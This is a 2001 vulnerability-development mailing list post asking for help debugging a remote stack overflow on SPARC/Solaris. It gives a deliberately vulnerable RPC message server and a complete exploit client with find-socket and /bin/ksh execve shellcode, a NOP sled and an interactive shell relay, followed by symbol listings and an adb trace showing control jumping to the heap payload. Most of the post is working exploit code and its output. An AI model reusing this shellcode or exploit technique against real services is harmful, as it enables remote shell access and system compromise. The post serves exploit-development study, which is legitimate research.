Vulnerability Development mailing list archives
remote overflow detail
From: Minchu Mo <morris_minchu () iwon com>
Date: 30 Oct 2001 14:50:24 -0000
Mailer: SecurityFocus
Thanks all the kind people for valuable response.
Here let me put my source code and some
debugging process to see whether you guys can find
out the problem:
Also some notes first:
1.For Golden_Eternity: To make sure the debugged
process have similiar address map, I use adb to
attach the running process rather than launch
process from adb.
2. For the debugging process followed, I got a
SIGSEGV in adb. But I do get a interactive shell from
client side the other days.In that case, I was able to
run "ls, pwd....", but the server closed the hijacked
sock file descriptor when I try to "more /etc/passwd"
3. For Dave Aitel: If I run the server freely without adb
or truss, the server doesn't crash with SIGSEGV, nor
spawn a shell. That's what I mean it seem to skip the
hacking code
4. For dotslash () snosoft com, I will post truss output
in another thread, I am afraid this one is too long
================================
RPC interface file msg.x
const MAXLEN=512;
typedef string svrmsg<MAXLEN>;
typedef char len_val<MAXLEN>;
typedef len_val fromName;
typedef len_val toName;
typedef len_val MSG;
struct username_msg {
fromName fromname;
toName toname;
MSG msg;
} ;
program MSGBOARD_PROG {
version MSGBOARD_VERSION {
svrmsg makemsg(username_msg)=1;
} = 1;
} = 200000089;
====================================
The vulnerable RPC server:
#include "msg.h"
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <rpc/rpc.h>
#include <unistd.h>
int dynMemSize=1536;
extern int errno;
void backup(char*, int);
void inbackup(char*, int);
svrmsg * makemsg_1(username_msg* un_msg,
struct svc_req *req)
{
static svrmsg smsg;
char *backmsg;
int fromInt, toInt, msgInt;
if(smsg!=NULL) free(smsg);
fromInt=un_msg->fromname.len_val_len;
toInt=un_msg->toname.len_val_len;
msgInt=un_msg->msg.len_val_len;
backmsg=malloc(dynMemSize);
memset(backmsg,'\x00', dynMemSize);
/*Client takes sometime to transmit the
msg*/
sleep(5);
/*Can't use strcpy cuz heap address
contain \x00*/
memcpy(backmsg, un_msg-
fromname.len_val_val, fromInt);
memcpy((char*)backmsg+fromInt, " said
to ", 12);
memcpy((char*)backmsg+fromInt+12, un_msg-
toname.len_val_val, toInt);
memcpy((char*)
backmsg+fromInt+toInt+12, "==> ", 4);
memcpy((char*)backmsg+fromInt+toInt+16,
un_msg->msg.len_val_val, msgInt);
/*Here call the vulnerable func*/
backup(un_msg->fromname.len_val_val,
fromInt);
smsg=&backmsg[0];
return (&smsg);
}
void backup(char* bkFromName, int nmlen)
{
inbackup(bkFromName, nmlen);
}
void inbackup(char *bkFromName, int nmlen)
{
char tempDir[12];
memcpy(tempDir,bkFromName, nmlen);
}
======================================
=======
The hacking client
#include "msg.h"
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <rpc/rpc.h>
#include <netdb.h>
#include <unistd.h>
char findsckcode[]=
"\x20\xbf\xff\xff" /* bn,a <findsckcode-4> */
"\x20\xbf\xff\xff" /* bn,a <findsckcode> */
"\x7f\xff\xff\xff" /* call <findsckcode+4> */
"\x33\x02\x12\x34"
"\xa0\x10\x20\xff" /* mov 0xff,%l0 */
"\xa2\x10\x20\x54" /* mov 0x54,%l1 */
"\xa4\x03\xff\xd0" /* add %o7,-48,%l2 */
"\xaa\x03\xe0\x28" /* add %o7,40,%l5
*/
"\x81\xc5\x60\x08" /* jmp %l5+8 */
"\xc0\x2b\xe0\x04" /* stb %g0,[%o7+4]
*/
"\xe6\x03\xff\xd0" /* ld [%o7-48],%l3 */
"\xe8\x03\xe0\x04" /* ld [%o7+4],%l4 */
"\xa8\xa4\xc0\x14" /* subcc %l3,%l4,%l4
*/
"\x02\xbf\xff\xfb" /* bz <findsckcode+32>
*/
"\xaa\x03\xe0\x5c" /* add %o7,92,%l5
*/
"\xe2\x23\xff\xc4" /* st %l1,[%o7-60] */
"\xe2\x23\xff\xc8" /* st %l1,[%o7-56] */
"\xe4\x23\xff\xcc" /* st %l2,[%o7-52] */
"\x90\x04\x20\x01" /* add %l0,1,%o0 */
"\xa7\x2c\x60\x08" /* sll %l1,8,%l3 */
"\x92\x14\xe0\x91" /* or %l3,0x91,%o1
*/
"\x94\x03\xff\xc4" /* add %o7,-60,%o2 */
"\x82\x10\x20\x36" /* mov 0x36,%g1 */
"\x91\xd0\x20\x08" /* ta 8 */
"\x1a\xbf\xff\xf1" /* bcc <findsckcode+36>
*/
"\xa0\xa4\x20\x01" /* deccc %l0 */
"\x12\xbf\xff\xf5" /* bne <findsckcode+60>
*/
"\xa6\x10\x20\x03" /* mov 0x03,%l3 */
"\x90\x04\x20\x02" /* add %l0,2,%o0 */
"\x92\x10\x20\x09" /* mov 0x09,%o1 */
"\x94\x04\xff\xff" /* add %l3,-1,%o2 */
"\x82\x10\x20\x3e" /* mov 0x3e,%g1 */
"\xa6\x84\xff\xff" /* addcc %l3,-1,%l3 */
"\x12\xbf\xff\xfb" /* bne <findsckcode+112>
*/
"\x91\xd0\x20\x08" /* ta 8 */
;
char shellcode[]=
"\x20\xbf\xff\xff" /* bn,a <shellcode-4> */
"\x20\xbf\xff\xff" /* bn,a <shellcode> */
"\x7f\xff\xff\xff" /* call <shellcode+4> */
"\x90\x03\xe0\x20" /* add %o7,32,%o0
*/
"\x92\x02\x20\x10" /* add %o0,16,%o1
*/
"\xc0\x22\x20\x08" /* st %g0,[%o0+8] */
"\xd0\x22\x20\x10" /* st %o0,[%o0+16]
*/
"\xc0\x22\x20\x14" /* st %g0,[%o0+20]
*/
"\x82\x10\x20\x0b" /* mov 0x0b,%g1 */
"\x91\xd0\x20\x08" /* ta 8 */
"/bin/ksh"
;
static char nop[]="\x80\x1c\x40\x11";
extern int errno;
static struct timeval TIMEOUT = { 25, 0 };
/*The xdr_req will replace normal rpc client request--
(xdrproc_t) xdr_svrmsg*/
bool_t xdr_req(XDR *xdrs,username_msg *objp){
if(!xdr_array(xdrs,&objp-
fromname.len_val_val,&objp- fromname.len_val_len,~0,sizeof(char), (xdrproc_t)
xdr_char)) return(FALSE);
if(!xdr_array(xdrs,&objp-
toname.len_val_val,&objp- toname.len_val_len,~0,sizeof(char), (xdrproc_t)
xdr_char)) return(FALSE);
if(!xdr_array(xdrs,&objp->msg.len_val_val,&objp-
msg.len_val_len,~0,sizeof(char), (xdrproc_t)
xdr_char)) return(FALSE);
return(TRUE);
}
main(int argc, char *argv[])
{
CLIENT *clnt;
char address[4];
char *b0, *b1, *b2, *b3;
char buffer[2048];
username_msg umsg;
svrmsg *result;
int sck, n, i, port=0;
enum clnt_stat stat;
struct hostent *hp;
struct sockaddr_in adr;
if (argc != 2) {
fprintf(stderr, "usage: %s host \n",argv[0]);
exit(1);
}
adr.sin_family=AF_INET;
adr.sin_port=htons(port);
if((adr.sin_addr.s_addr=inet_addr(argv[1]))==-1){
if((hp=gethostbyname(argv[1]))==NULL){
errno=EADDRNOTAVAIL;perror("error");exit(-
1);
}
memcpy(&adr.sin_addr.s_addr,hp->h_addr,4);
}
/*create a RPC session based on tcp, */
*/
sck=RPC_ANYSOCK;
clnt = clnttcp_create(&adr, MSGBOARD_PROG,
MSGBOARD_VERSION, &sck,0,0);
if (clnt == (CLIENT *)NULL) {
clnt_pcreateerror("error");
exit(1);
}
i=sizeof(struct sockaddr_in);
if(getsockname(sck,(struct sockaddr*)&adr,&i)==-1)
{
struct{unsigned int maxlen;unsigned int len;char
*buf;}nb;
ioctl(sck,(('S'<<8)|2),"sockmod");
nb.maxlen=0xffff;
nb.len=sizeof(struct sockaddr_in);;
nb.buf=(char*)&adr;
ioctl(sck,(('T'<<8)|144),&nb);
}
n=ntohs(adr.sin_port);
printf("port=%d connected! \n",n);fflush(stdout);
sleep(3);
findsckcode[12+2]=(unsigned char)((n&0xff00)>>8);
findsckcode[12+3]=(unsigned char)(n&0xff);
*(unsigned int*)address=0x6dc80;
*(unsigned int*)address=htonl(*(unsigned int*)
address);
b0=&buffer[0];
b1=&buffer[0];
for(i=0;i<252;i++) *b1++=address[i%4];
for(i=0;i<4;i++) *b1++=0;
b2=&buffer[256];
for(i=256;i<508;i++) *b2++=address[i%4];
for(i=0;i<4;i++) *b2++=0;
b3=&buffer[512];
for(i=0;i<256;i++) *b3++=nop[i%4];
for(i=0;i<strlen(findsckcode);i++)
*b3++=findsckcode[i];
for(i=0;i<strlen(shellcode);i++) *b3++=shellcode[i];
*b3=0;
/*refer to xdr_array function and msg.x to see how
xdr conversion goes*/
umsg.fromname.len_val_len=252;
umsg.fromname.len_val_val=b0;
umsg.toname.len_val_len=252;
umsg.toname.len_val_val=b1;
umsg.msg.len_val_len=456;
umsg.msg.len_val_val=b2;
stat = clnt_call(clnt, makemsg , (xdrproc_t) xdr_req,
(caddr_t) &umsg, xdr_void , NULL, TIMEOUT);
if (stat==RPC_SUCCESS) {printf("\nerror: not
vulnerable\n");exit(-1);}
printf("sent!\n");
write(sck,"/bin/uname -a\n",14);
while(1){
fd_set fds;
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(sck,&fds);
if(select(FD_SETSIZE,&fds,NULL,NULL,NULL)){
int cnt;
char buf[1024];
if(FD_ISSET(0,&fds)){
if((cnt=read(0,buf,1024))<1){
if
(errno==EWOULDBLOCK||errno==EAGAIN)
continue;
else break;
}
write(sck,buf,cnt);
}
if(FD_ISSET(sck,&fds)){
if((cnt=read(sck,buf,1024))<1){
if
(errno==EWOULDBLOCK||errno==EAGAIN)
continue;
else break;
}
write(1,buf,cnt);
}
}
}
}
============================
==> list the name list first
testbox:/home/minchumo nm -x msg_svc
msg_svc:
[Index] Value Size Type Bind Other Shndx
Name
[26] |0x00000000|0x00000000|SECT |LOCL |0
|25 |
[2] |0x000100d4|0x00000000|SECT |LOCL |0
|1 |
[3] |0x000100e8|0x00000000|SECT |LOCL |0
|2 |
[4] |0x000103c4|0x00000000|SECT |LOCL |0
|3 |
[5] |0x000109e4|0x00000000|SECT |LOCL |0
|4 |
[6] |0x00010d10|0x00000000|SECT |LOCL |0
|5 |
[7] |0x00010d50|0x00000000|SECT |LOCL |0
|6 |
[8] |0x00010d80|0x00000000|SECT |LOCL |0
|7 |
[9] |0x00010d8c|0x00000000|SECT |LOCL |0
|8 |
[10] |0x00010f40|0x00000000|SECT |LOCL |0
|9 |
[11] |0x00011b20|0x00000000|SECT |LOCL |0
|10 |
[12] |0x00011b70|0x00000000|SECT |LOCL |0
|11 |
[13] |0x00011bc0|0x00000000|SECT |LOCL |0
|12 |
[14] |0x00011bc4|0x00000000|SECT |LOCL |0
|13 |
[15] |0x00011bc8|0x00000000|SECT |LOCL |0
|14 |
[16] |0x00021c14|0x00000000|SECT |LOCL |0
|15 |
[17] |0x00021c18|0x00000000|SECT |LOCL |0
|16 |
[18] |0x00021dfc|0x00000000|SECT |LOCL |0
|17 |
[19] |0x00021ebc|0x00000000|SECT |LOCL |0
|18 |
[20] |0x00021ee8|0x00000000|SECT |LOCL |0
|19 |
[21] |0x00021f1c|0x00000000|SECT |LOCL |0
|20 |
[22] |0x00021ffc|0x00000000|SECT |LOCL |0
|21 |
[23] |0x00000000|0x00000000|SECT |LOCL |0
|22 |
[24] |0x00000000|0x00000000|SECT |LOCL |0
|23 |
[25] |0x00000000|0x00000000|SECT |LOCL |0
|24 |
[27] |0x00000000|0x00000000|SECT |LOCL |0
|26 |
[28] |0x00000000|0x00000000|SECT |LOCL |0
|27 |
[82] |0x00021dfc|0x00000000|OBJT |GLOB |0
|17 |_DYNAMIC
[30] |0x00022010|0x00000000|OBJT |LOCL |0
|21 |_END_
[62] |0x00021c14|0x00000000|OBJT |GLOB |0
|15 |_GLOBAL_OFFSET_TABLE_
[105] |0x00021c18|0x00000000|OBJT |GLOB |0
|16 |_PROCEDURE_LINKAGE_TABLE_
[29] |0x00010000|0x00000000|OBJT |LOCL |0
|1 |_START_
[51] |0x00000000|0x00000000|NOTY |WEAK |0
|UNDEF |__1cH__CimplKcplus_fini6F_v_
[119] |0x00000000|0x00000000|NOTY |WEAK |0
|UNDEF |__1cH__CimplKcplus_init6F_v_
[78] |0x00021f0c|0x00000004|OBJT |GLOB |0
|19 |___Argv
[93] |0x00021f08|0x00000004|OBJT |GLOB |0
|19 |__cg92_used
[36] |0x00021f04|0x00000004|OBJT |LOCL |0
|19 |__crt_scratch
[117] |0x00021ee8|0x00000018|OBJT |GLOB |0
|19 |__environ_lock
[107] |0x00000000|0x00000000|NOTY |GLOB |0
|ABS |__fsr_init_value
[104] |0x00021ff9|0x00000000|OBJT |GLOB |0
|20 |_edata
[58] |0x00022010|0x00000000|OBJT |GLOB |0
|21 |_end
[57] |0x00021f00|0x00000004|OBJT |GLOB |0
|19 |_environ
[109] |0x00011c14|0x00000000|OBJT |GLOB |0
|14 |_etext
[90] |0x00000000|0x00000000|NOTY |WEAK |0
|UNDEF |_ex_deregister
[33] |0x00011bc0|0x00000000|NOTY |LOCL |0
|12 |_ex_range0
[49] |0x00011bc0|0x00000000|NOTY |LOCL |0
|12 |_ex_range1
[61] |0x00000000|0x00000000|NOTY |WEAK |0
|UNDEF |_ex_register
[32] |0x00021ecc|0x00000000|NOTY |LOCL |0
|18 |_ex_shared0
[48] |0x00021edc|0x00000000|NOTY |LOCL |0
|18 |_ex_shared1
[34] |0x00010f40|0x00000000|NOTY |LOCL |0
|9 |_ex_text0
[50] |0x00011b20|0x00000000|NOTY |LOCL |0
|9 |_ex_text1
[88] |0x00021c60|0x00000000|FUNC |GLOB |0
|UNDEF |_exit
[118] |0x00011b70|0x00000050|FUNC |GLOB |0
|11 |_fini
[73] |0x00011b20|0x00000050|FUNC |GLOB |0
|10 |_init
[110] |0x00011bc4|0x00000004|OBJT |GLOB |0
|13 |_lib_version
[42] |0x000111f8|0x00000024|FUNC |LOCL |0
|9 |_msgout
[45] |0x00022000|0x00000004|OBJT |LOCL |0
|21 |_rpcpmstart
[41] |0x00021f18|0x00000004|OBJT |LOCL |0
|19 |_rpcsvccount
[40] |0x00021f14|0x00000004|OBJT |LOCL |0
|19 |_rpcsvcstate
[52] |0x00010f40|0x000000d0|FUNC |GLOB |0
|9 |_start
[69] |0x00021cc0|0x00000000|FUNC |GLOB |0
|UNDEF |alarm
[67] |0x00021c48|0x00000000|FUNC |GLOB |0
|UNDEF |atexit
[60] |0x00011180|0x00000028|FUNC |GLOB |0
|9 |backup
[97] |0x00021d98|0x00000000|FUNC |GLOB |0
|UNDEF |close
[43] |0x00011230|0x00000118|FUNC |LOCL |0
|9 |closedown
[35] |0x00000000|0x00000000|FILE |LOCL |0
|ABS |crt1.s
[31] |0x00000000|0x00000000|FILE |LOCL |0
|ABS |crti.s
[47] |0x00000000|0x00000000|FILE |LOCL |0
|ABS |crtn.s
[80] |0x00021db0|0x00000000|FUNC |GLOB |0
|UNDEF |dup2
[112] |0x00021f10|0x00000004|OBJT |GLOB |0
|19 |dynMemSize
[91] |0x00021f00|0x00000004|OBJT |WEAK |0
|19 |environ
[68] |0x00021c54|0x00000000|FUNC |GLOB |0
|UNDEF |exit
[59] |0x00021d74|0x00000000|FUNC |GLOB |0
|UNDEF |fork
[96] |0x00021c6c|0x00000000|FUNC |GLOB |0
|UNDEF |free
[76] |0x00021d50|0x00000000|FUNC |GLOB |0
|UNDEF |freenetconfigent
[79] |0x00021d2c|0x00000000|FUNC |GLOB |0
|UNDEF |getenv
[71] |0x00021d38|0x00000000|FUNC |GLOB |0
|UNDEF |getnetconfigent
[100] |0x00021d8c|0x00000000|FUNC |GLOB |0
|UNDEF |getrlimit
[103] |0x000111b8|0x0000002c|FUNC |GLOB |0
|9 |inbackup
[113] |0x00011570|0x00000334|FUNC |GLOB |0
|9 |main
[56] |0x00011020|0x0000014c|FUNC |GLOB |0
|9 |makemsg_1
[72] |0x00021c78|0x00000000|FUNC |GLOB |0
|UNDEF |malloc
[116] |0x00021c9c|0x00000000|FUNC |GLOB |0
|UNDEF |memcpy
[106] |0x00021c84|0x00000000|FUNC |GLOB |0
|UNDEF |memset
[38] |0x00000000|0x00000000|FILE |LOCL |0
|ABS |msg_proc.c
[1] |0x00000000|0x00000000|FILE |LOCL |0
|ABS |msg_svc
[39] |0x00000000|0x00000000|FILE |LOCL |0
|ABS |msg_svc.c
[46] |0x00000000|0x00000000|FILE |LOCL |0
|ABS |msg_xdr.c
[44] |0x00011358|0x00000204|FUNC |LOCL |0
|9 |msgboard_prog_1
[99] |0x00021da4|0x00000000|FUNC |GLOB |0
|UNDEF |open
[70] |0x00021d20|0x00000000|FUNC |GLOB |0
|UNDEF |openlog
[92] |0x00021d80|0x00000000|FUNC |GLOB |0
|UNDEF |perror
[87] |0x00021dbc|0x00000000|FUNC |GLOB |0
|UNDEF |setsid
[65] |0x00021cb4|0x00000000|FUNC |GLOB |0
|UNDEF |signal
[86] |0x00021d08|0x00000000|FUNC |GLOB |0
|UNDEF |sigset
[64] |0x00021c90|0x00000000|FUNC |GLOB |0
|UNDEF |sleep
[81] |0x00021dc8|0x00000000|FUNC |GLOB |0
|UNDEF |svc_create
[84] |0x00022008|0x00000004|OBJT |GLOB |0
|21 |svc_max_pollfd
[120] |0x0002200c|0x00000004|OBJT |GLOB |0
|21 |svc_pollfd
[83] |0x00021d5c|0x00000000|FUNC |GLOB |0
|UNDEF |svc_reg
[101] |0x00021d68|0x00000000|FUNC |GLOB |0
|UNDEF |svc_run
[75] |0x00021cd8|0x00000000|FUNC |GLOB |0
|UNDEF |svc_sendreply
[89] |0x00021d44|0x00000000|FUNC |GLOB |0
|UNDEF |svc_tli_create
[74] |0x00021cf0|0x00000000|FUNC |GLOB |0
|UNDEF |svcerr_decode
[85] |0x00021ce4|0x00000000|FUNC |GLOB |0
|UNDEF |svcerr_noproc
[66] |0x00021cfc|0x00000000|FUNC |GLOB |0
|UNDEF |svcerr_systemerr
[114] |0x00021ca8|0x00000000|FUNC |GLOB |0
|UNDEF |syslog
[55] |0x00022004|0x00000004|OBJT |GLOB |0
|21 |t_errno
[54] |0x00021d14|0x00000000|FUNC |GLOB |0
|UNDEF |t_getstate
[37] |0x00000000|0x00000000|FILE |LOCL |0
|ABS |values-Xa.c
[102] |0x00011a30|0x00000044|FUNC |GLOB |0
|9 |xdr_MSG
[94] |0x00021dec|0x00000000|FUNC |GLOB |0
|UNDEF |xdr_array
[98] |0x00021de0|0x00000000|FUNC |GLOB |0
|UNDEF |xdr_char
[111] |0x00011980|0x00000044|FUNC |GLOB |0
|9 |xdr_fromName
[63] |0x00011910|0x0000005c|FUNC |GLOB |0
|9 |xdr_len_val
[115] |0x00021dd4|0x00000000|FUNC |GLOB |0
|UNDEF |xdr_string
[77] |0x000118b8|0x00000048|FUNC |GLOB |0
|9 |xdr_svrmsg
[95] |0x000119d8|0x00000044|FUNC |GLOB |0
|9 |xdr_toName
[108] |0x00011a88|0x00000094|FUNC |GLOB |0
|9 |xdr_username_msg
[53] |0x00021ccc|0x00000000|FUNC |GLOB |0
|UNDEF |xdr_void
testbox:/home/minchumo
============================
Experiment Log
==>Normal usage of the RPC Service
testbox:/home/minchumo rmsg testbox dog cat hi
dog said to cat==> hi
testbox:/home/minchumo
===>Exploitation:
0. Run server msg_svc
1. First several normal executions of RPC server as
above.
2. Run hacking code
3. Interact as following
==>Client side
testbox:/home/minchumo rmsge testbox
port=59985 connected!
sent!
===>Server side
testbox:/home/minchumo r ps
ps -ef | grep msg
minchumo 6928 6142 0 10:26:30 pts/4 0:00 grep
msg
minchumo 6924 1 0 10:25:46 ? 0:00 msg_svc
testbox:/home/minchumo adb
0t6924:A
process 6924 stopped at:
_poll+4: ta 0x8
/*stop at entry point makemsg_1*/
makemsg_1:b
:c
breakpoint at:
makemsg_1: save %sp, -0x78, %sp
:s
stopped at:
makemsg_1+4: st %i1, [%fp + 0x48]
:s
stopped at:
makemsg_1+8: st %i0, [%fp + 0x44]
:S
stopped at:
makemsg_1+0xc: sethi %hi(0x21c00), %l0
:s
stopped at:
makemsg_1+0x10: ld [%l0 + 0x3fc], %l0
:s
stopped at:
makemsg_1+0x14: cmp %l0, %g0
:s
stopped at:
makemsg_1+0x18: be makemsg_1+0x2c
:s
stopped at:
makemsg_1+0x1c: nop
:s
stopped at:
makemsg_1+0x20: sethi %hi(0x21c00), %l0
:s
stopped at:
/*This is call to function free, since we have normal
client request before
The dynamic memory was allocated and need to be
freed*/
makemsg_1+0x24: call 0x21c6c
:s
stopped at:
makemsg_1+0x28: ld [%l0 + 0x3fc], %o0
:s
stopped at:
21c6c: sethi %hi(0x15000), %g1
:s
stopped at:
21c70: sethi %hi(0xff1c6400), %g1
$r
g0 0 l0 21c00
g1 15000 xdr_username_msg+0x3578 l1 0
g2 0 l2 0
g3 0 l3 0
g4 0 l4 0
g5 0 l5 0
g6 0 l6 0
g7 0 l7 0
o0 6da58 i0 ffbeee48
o1 0 i1 24808
_rpcpmstart+0x2808
o2 0 i2 ffbeee48
o3 0 i3 66f00
o4 0 i4 ff311c8c
o5 0 i5 ffbeee61
sp ffbeed60 fp ffbeedd8
o7 11044 makemsg_1+0x24 i7
114ac msgboard_prog_1+0x154
y 0
tstate: 82001a07 (ccr=0x0, asi=0x82, pstate=0x1a,
cwp=0x7)
pstate: ag:0 ie:1 priv:0 am:1 pef:1 mm:0 tle:0 cle:0
mg:0 ig:0
pc 21c70 21c70: sethi %hi(0xff1c6400), %
g1
npc 21c74 21c74: jmp %g1 + 0x14c
/*The address 6da58 point to server response for last
client request
This dynamic memory will be free*/
6da58/4X
6da58: 646f6720 20736169
64202074 6f202063
6da58/S
6da58: dog said to cat==> hi
memset:b
:c
breakpoint at:
memset: mov %o0, %o5
$r
g0 0 l0 21f10
dynMemSize
g1 1e000 l1 ffbeee48
g2 0 l2 0
g3 0 l3 0
g4 0 l4 0
g5 0 l5 0
g6 0 l6 0
g7 0 l7 0
o0 6da58 i0 ffbeee48
o1 0 i1 24808
_rpcpmstart+0x2808
o2 600 i2 ffbeee48
o3 0 i3 66f00
o4 ff235ad4 i4 ff311c8c
o5 11044 makemsg_1+0x24 i5 ffbeee61
sp ffbeed60 fp ffbeedd8
o7 11080 makemsg_1+0x60 i7
114ac msgboard_prog_1+0x154
y 0
tstate: 82001a04 (ccr=0x0, asi=0x82, pstate=0x1a,
cwp=0x4)
pstate: ag:0 ie:1 priv:0 am:1 pef:1 mm:0 tle:0 cle:0
mg:0 ig:0
pc ff33190c memset: mov %o0, %o5
npc ff331910 _memset+4: cmp %o2, 0x10
memcpy:b
:c
/* encounter the alarm for sleep after 5 sec. the
server is waken
We now know the adb will receive system call for
signal handleing*/
SIGALRM: Alarm Clock
stopped at:
_sigsuspend+4: ta 0x8
:c
/*The following are five memcpy which move client
request to dynamic
allocated memory address*/
breakpoint at:
memcpy: mov %o0, %o5
:c
breakpoint at:
memcpy: mov %o0, %o5
:c
breakpoint at:
memcpy: mov %o0, %o5
:c
breakpoint at:
memcpy: mov %o0, %o5
backup:b
:c
breakpoint at:
memcpy: mov %o0, %o5
:c
breakpoint at:
backup: save %sp, -0x60, %sp
:s
stopped at:
backup+4: st %i1, [%fp + 0x48]
$r
g0 0 l0 0
g1 676a8 l1 0
g2 0 l2 0
g3 0 l3 0
g4 0 l4 0
g5 0 l5 0
g6 0 l6 0
g7 0 l7 0
o0 0 i0 67470
o1 0 i1 fc
o2 0 i2 0
o3 0 i3 0
o4 0 i4 0
o5 0 i5 6dc60
sp ffbeed00 fp ffbeed60
o7 0 i7 11138
makemsg_1+0x118
y 0
tstate: 4482001a06 (ccr=0x44, asi=0x82,
pstate=0x1a, cwp=0x6)
pstate: ag:0 ie:1 priv:0 am:1 pef:1 mm:0 tle:0 cle:0
mg:0 ig:0
pc 11184 backup+4: st %i1, [%fp + 0x48]
npc 11188 backup+8: st %i0, [%fp + 0x44]
/*After 5 memcpy, we can inspect the dyn. memory
to see whether request
was copied intact, and they seem to be good as
following*/
6da58/40X
6da58: 6dc80 6dc80 6dc80
6dc80
6dc80 6dc80 6dc80
6dc80
6dc80 6dc80 6dc80
6dc80
6dc80 6dc80 6dc80
6dc80
6dc80 6dc80 6dc80
6dc80
6dc80 6dc80 6dc80
6dc80
6dc80 6dc80 6dc80
6dc80
6dc80 6dc80 6dc80
6dc80
6dc80 6dc80 6dc80
6dc80
6dc80 6dc80 6dc80
6dc80
6daf8: 6dc80 6dc80 6dc80
6dc80
6dc80 6dc80 6dc80
6dc80
6dc80 6dc80 6dc80
6dc80
6dc80 6dc80 6dc80
6dc80
6dc80 6dc80 6dc80
6dc80
6dc80 6dc80 6dc80
20207361
69642020 746f2020 6dc80
6dc80
6dc80 6dc80 6dc80
6dc80
6dc80 6dc80 6dc80
6dc80
6dc80 6dc80 6dc80
6dc80
6db98: 6dc80 6dc80 6dc80
6dc80
6dc80 6dc80 6dc80
6dc80
6dc80 6dc80 6dc80
6dc80
6dc80 6dc80 6dc80
6dc80
6dc80 6dc80 6dc80
6dc80
6dc80 6dc80 6dc80
6dc80
6dc80 6dc80 6dc80
6dc80
6dc80 6dc80 6dc80
6dc80
6dc80 6dc80 6dc80
6dc80
6dc80 6dc80 6dc80
6dc80
6dc38: 6dc80 6dc80 6dc80
6dc80
6dc80 6dc80 6dc80
6dc80
6dc80 3d3d3e20 801c4011
801c4011
801c4011 801c4011
801c4011 801c4011
801c4011 801c4011
801c4011 801c4011
801c4011 801c4011
801c4011 801c4011
801c4011 801c4011
801c4011 801c4011
801c4011 801c4011
801c4011 801c4011
801c4011 801c4011
801c4011 801c4011
801c4011 801c4011
801c4011 801c4011
6dcd8: 801c4011 801c4011
801c4011 801c4011
801c4011 801c4011
801c4011 801c4011
801c4011 801c4011
801c4011 801c4011
801c4011 801c4011
801c4011 801c4011
801c4011 801c4011
801c4011 801c4011
801c4011 801c4011
801c4011 801c4011
801c4011 801c4011
801c4011 801c4011
801c4011 801c4011
801c4011 801c4011
801c4011 801c4011 20bfffff
20bfffff
7fffffff 3302ea51 a01020ff
a2102054
6dd78: a403ffd0 aa03e028
81c56008 c02be004
e603ffd0 e803e004 a8a4c014
2bffffb
aa03e05c e223ffc4 e223ffc8
e423ffcc
90042001 a72c6008
9214e091 9403ffc4
82102036 91d02008 1abffff1
a0a42001
12bffff5 a6102003 90042002
92102009
9404ffff 8210203e a684ffff
12bffffb
91d02008 20bfffff 20bfffff 7fffffff
9003e020 92022010
c0222008 d0222010
c0222014 8210200b
91d02008 2f62696e
6de18: 2f6b7368 0 0 0
0 0 0 0
0 0 0 0
0 0 0 0
0 0 0 0
0 0 0 0
0 0 0 0
0 0 0 0
0 0 0 0
0 0 0 0
backup+4/i
/*Now call into vulerable function to overflow and
jump to heap*/
backup+4: st %i1, [%fp + 0x48]
:S
stopped at:
backup+8: st %i0, [%fp + 0x44]
:s
stopped at:
backup+0xc: or %i0, %g0, %o0
:s
stopped at:
backup+0x10: call inbackup
:s
stopped at:
backup+0x14: or %i1, %g0, %o1
:s
stopped at:
inbackup: save %sp, -0x70, %sp
:s
stopped at:
inbackup+4: st %i1, [%fp + 0x48]
:S
stopped at:
inbackup+8: st %i0, [%fp + 0x44]
:s
stopped at:
inbackup+0xc: add %fp, -0xc, %o0
:s
stopped at:
inbackup+0x10: or %i0, %g0, %o1
:s
stopped at:
inbackup+0x14: call 0x21c9c
:s
stopped at:
inbackup+0x18: or %i1, %g0, %o2
:s
stopped at:
21c9c: sethi %hi(0x21000), %g1
inbackup+0x1c:b
:c
breakpoint at:
memcpy: mov %o0, %o5
:s
stopped at:
forcpy+4: cmp %o2, 0x20
:s
stopped at:
forcpy+8: ???
:c
breakpoint at:
inbackup+0x1c: ret
:s
stopped at:
inbackup+0x20: restore
:s
stopped at:
backup+0x18: ret
:s
stopped at:
backup+0x1c: restore
:s
stopped at:
/*Now process controll was transmitted to heap*/
6dc88: xor %l1, %l1, %g0
$r
g0 0 l0 801c4011
g1 67568 l1 801c4011
g2 0 l2 801c4011
g3 0 l3 801c4011
g4 0 l4 801c4011
g5 0 l5 801c4011
g6 0 l6 801c4011
g7 0 l7 801c4011
o0 6dc80 i0 801c4011
o1 6dc80 i1 801c4011
o2 6dc80 i2 801c4011
o3 6dc80 i3 801c4011
o4 6dc80 i4 801c4011
o5 6dc80 i5 801c4011
sp 6dc80 fp 801c4011
o7 6dc80 i7 801c4011
y 0
tstate: 4482001a01 (ccr=0x44, asi=0x82,
pstate=0x1a, cwp=0x1)
pstate: ag:0 ie:1 priv:0 am:1 pef:1 mm:0 tle:0 cle:0
mg:0 ig:0
pc 6dc88 6dc88: xor %l1, %l1, %g0
npc 6dc8c 6dc8c: xor %l1, %l1, %g0
.,40/i
6dc8c: xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
